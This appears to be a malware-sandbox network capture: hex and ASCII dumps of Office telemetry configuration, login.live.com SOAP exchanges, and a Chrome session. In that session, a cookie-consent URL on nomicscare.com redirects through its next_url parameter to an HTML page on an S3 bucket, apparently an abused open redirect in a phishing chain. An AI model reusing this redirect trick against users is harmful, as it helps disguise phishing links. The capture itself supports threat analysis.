                                                                                                                              2024-10-04 13:10:42 UTC16384INData Raw: 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d
                                                                                                                              Data Ascii: </O> </F> <F T="6"> <O T="AND"> <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L>
                                                                                                                              2024-10-04 13:10:42 UTC16384INData Raw: 20 20 20 20 20 3c 53 20 54 3d 22 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f
                                                                                                                              Data Ascii: <S T="25" /> </C> </C> <C T="U32" I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O
                                                                                                                              2024-10-04 13:10:42 UTC16384INData Raw: 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 39 30 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d
                                                                                                                              Data Ascii: </T></R><$!#>10907v0+<?xml version="1.0" encoding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns="">
                                                                                                                              2024-10-04 13:10:42 UTC16384INData Raw: 20 3c 53 3e 0d 0a 20 20 20 20 3c 54 49 20 54 3d 22 31 22 20 49 3d 22 44 61 69 6c 79 22 20 2f 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20
                                                                                                                              Data Ascii: <S> <TI T="1" I="Daily" /> <A T="2" E="TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" />
                                                                                                                              2024-10-04 13:10:43 UTC16384INData Raw: 6b 30 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74
                                                                                                                              Data Ascii: k0m" /> <F T="6"> <O T="EQ"> <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="t
                                                                                                                              2024-10-04 13:10:43 UTC16384INData Raw: 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                              Data Ascii: 4" T="U32" /> </R> </O> </F> <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="
                                                                                                                              2024-10-04 13:10:43 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20
                                                                                                                              Data Ascii: <O T="EQ"> <L> <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.174971020.190.159.2443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:10:43 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/soap+xml
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                              Content-Length: 3592
                                                                                                                              Host: login.live.com
                                                                                                                              2024-10-04 13:10:43 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                              2024-10-04 13:10:44 UTC569INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                                              Expires: Fri, 04 Oct 2024 13:09:44 GMT
                                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              x-ms-route-info: C529_BAY
                                                                                                                              x-ms-request-id: 8ce25486-b549-47fe-8db6-d33f8b4364c1
                                                                                                                              PPServer: PPV: 30 H: PH1PEPF00011CB0 V: 0
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              Date: Fri, 04 Oct 2024 13:10:43 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 11389
                                                                                                                              2024-10-04 13:10:44 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.174971120.190.159.2443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:10:45 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/soap+xml
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                              Content-Length: 4775
                                                                                                                              Host: login.live.com
                                                                                                                              2024-10-04 13:10:45 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                              2024-10-04 13:10:46 UTC569INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                                              Expires: Fri, 04 Oct 2024 13:09:46 GMT
                                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              x-ms-route-info: C529_BL2
                                                                                                                              x-ms-request-id: c47d6065-b5b6-4ef1-8ea4-a21d935d52a2
                                                                                                                              PPServer: PPV: 30 H: BL02EPF0001D969 V: 0
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              Date: Fri, 04 Oct 2024 13:10:46 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 11389
                                                                                                                              2024-10-04 13:10:46 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.174971551.255.64.1704432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:10:46 UTC733OUTGET /fr/gdpr/cookie-consent/all/?next_url=//crewbloom.s3.amazonaws.com/34873.html HTTP/1.1
                                                                                                                              Host: nomicscare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:10:47 UTC1261INHTTP/1.1 302 Found
                                                                                                                              Server: nginx/1.14.1
                                                                                                                              Date: Fri, 04 Oct 2024 13:10:47 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              Location: //crewbloom.s3.amazonaws.com/34873.html
                                                                                                                              X-Frame-Options: DENY
                                                                                                                              Content-Language: fr
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Set-Cookie: cookie_consent=accepted; Domain=nomicscare.com; expires=Sat, 04-Oct-2025 13:10:47 GMT; Max-Age=31536000; Path=/
                                                                                                                              Set-Cookie: cookie_consent_all=accepted; Domain=nomicscare.com; expires=Sat, 04-Oct-2025 13:10:47 GMT; Max-Age=31536000; Path=/
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              Permissions-Policy: geolocation=(),midi=(),sync-xhr=(),microphone=(),camera=(),magnetometer=(),gyroscope=(),fullscreen=(self),payment=()
                                                                                                                              Set-Cookie: Path=/; HttpOnly; Secure
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.174971720.190.159.2443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:10:47 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/soap+xml
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                              Content-Length: 4775
                                                                                                                              Host: login.live.com
                                                                                                                              2024-10-04 13:10:47 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                              2024-10-04 13:10:47 UTC569INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                                              Expires: Fri, 04 Oct 2024 13:09:47 GMT
                                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              x-ms-route-info: C529_BL2
                                                                                                                              x-ms-request-id: 0fdda9db-e64a-4f5d-a9ba-bb9a67f22426
                                                                                                                              PPServer: PPV: 30 H: BL02EPF0001D817 V: 0
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              Date: Fri, 04 Oct 2024 13:10:47 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 11389
                                                                                                                              2024-10-04 13:10:47 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.17497193.5.1.1224432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:10:48 UTC679OUTGET /34873.html HTTP/1.1
                                                                                                                              Host: crewbloom.s3.amazonaws.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:10:48 UTC426INHTTP/1.1 200 OK
                                                                                                                              x-amz-id-2: Yf4yA6qkkVNc+heJPRgDiywi8Z6Z04cqNSRsuiQHm8oYujMdcNkKX5wWDukOC/un9yO+cPIPBAGQ4XMz5sQmdA==
                                                                                                                              x-amz-request-id: DF6P3QG5262K3F71
